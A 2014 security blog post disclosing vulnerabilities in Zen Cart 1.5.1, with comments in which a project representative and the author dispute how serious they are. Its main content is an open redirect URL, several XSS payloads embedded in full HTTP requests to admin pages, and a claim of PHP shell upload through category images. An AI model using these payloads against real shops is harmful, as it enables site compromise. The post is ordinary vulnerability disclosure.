Monday, 24 February 2014

[EN] Multiple XSS / Shell upload possibility in latest ZenCart

# ==============================================================
# Title ...| Multiple vulnerabilities in Zen Cart e-commerce
# Version .| zen-cart-v1.5.1-full-fileset-09182012
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================

[+] For not-authenticated user:

# ==============================================================
# 1.  Redirection to any (phishing?) site:

---<request>---
10.149.14.62//k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/index.php?main_page=redirect&action=url&goto=www.google.com

---<request>---

==============================================================
[+] For admin user logged-in

# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/gv_mail.php?action=preview HTTP/1.1
Host: 10.149.14.62
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 232

securityToken=c708c6bfb991c954612cf368ba24b1b2&customers_email_address=&email_to='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&from=admin%40here.com&subject=asd&amount=123&message=We%27re+pleased+to+offer+you+a+Gift+Certificate&x=27&y=8
---<request>---


# ==============================================================
# 3. XSS

---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/coupon_admin.php?action=update&oldaction=new&cid=0&page=0 HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&coupon_name%5B1%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&coupon_desc%5B1%5D=asd&coupon_amount=123&coupon_min_order=2&coupon_free_ship=on&coupon_code=123123&coupon_uses_coupon=&coupon_uses_user=1&coupon_startdate_day=24&coupon_startdate_month=2&coupon_startdate_year=2014&coupon_finishdate_day=24&coupon_finishdate_month=2&coupon_finishdate_year=2015&coupon_zone_restriction=0&x=58&y=14
---<request>---


Also vulnerable are:
coupon_desc%5B1%5D, coupon_min_order,coupon_free_ship, coupon_code,coupon_uses_coupon, coupon_uses_user


# ==============================================================
# 4. XSS

---<request>---

POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/developers_tool_kit.php?action=locate_configuration HTTP/1.1
Host: 10.149.14.62
(...)

securityToken=c708c6bfb991c954612cf368ba24b1b2&configuration_key='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&zv_files=1&x=16&y=6

---<request>---


# ==============================================================
# 5. XSS

---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&geo_zone_name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&geo_zone_description=asdasdasd&x=26&y=149

---<request>---



# ==============================================================
# 6. XSS

---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/orders_status.php?page=1&action=insert HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&orders_status_name%5B1%5D=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&x=29&y=10

---<request>---



# ==============================================================
# 7. XSS

---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/countries.php?page=1&action=insert HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&countries_name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&countries_iso_code_2=asd&countries_iso_code_3=asdasd&address_format_id=1&x=30&y=10
---<request>---



# ==============================================================
# 8. Shell upload possibility when creating new category:


k@lab:~/public_html/cms/zen/zen-cart-v1.5.1-full-fileset-09182012$ find ./ | grep shell.php
./images/categories/mishell.php
k@lab:~/public_html/cms/zen/zen-cart-v1.5.1-full-fileset-09182012$

;)


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

3 comments:

  1. Interesting that HauntIT decided to publish without first contacting the Zen Cart team for comment.

    a) Redirect to another site. That is not a phishing problem.
    b) XSS -- all the admin pages are protected from XSRF via a securityToken, and requires the administrator to be logged in, thus preventing abuse from external sources.
    c) Shell upload -- A properly installed and configured site not only won't allow upload of .php files, but also won't allow execution of them via browsers by virtue of .htaccess protections (or equivalents on non-Apache web engines). Furthermore, upload of category images requires admin login as well.

    ReplyDelete
  2. This comment has been removed by the author.

    ReplyDelete
  3. Thanks for watching first ;)

    Answering to:
    0) it is also interesting,that companies are interested in answering to any bugs, when they are already public, isn't it? ;)

    a) yep, it's not a phishing problem, it's not a bug, and it's even not a zen cart code, right? In my opinion it IS a phishing bug, because if you will go via this link to site contains malware, there it is a vulnerability.

    b) sure, there is anti-csrf but who cares when you have still no filter to user input?

    c) I checked it, and I don't agree with you. Ok, there is a limitation to .php files but it's also possible to create category with php file (so 'in other place' there is no filtration = still a bug).

    If you have any questions or proposal, feel free to contact me directly via email.

    btw if your answer to security is 'but it is in admin panel' check my post about Concrete5 sql injection, because vendor says too, that 'it's not a bug because it is in admin panel'. (for tl;dr: what if someone will bruteforce your sup3rp4ss?)

    and btw2: if it not 'so vulnerable' - why do you even care?

    Cheers o/

    ReplyDelete

What do You think...?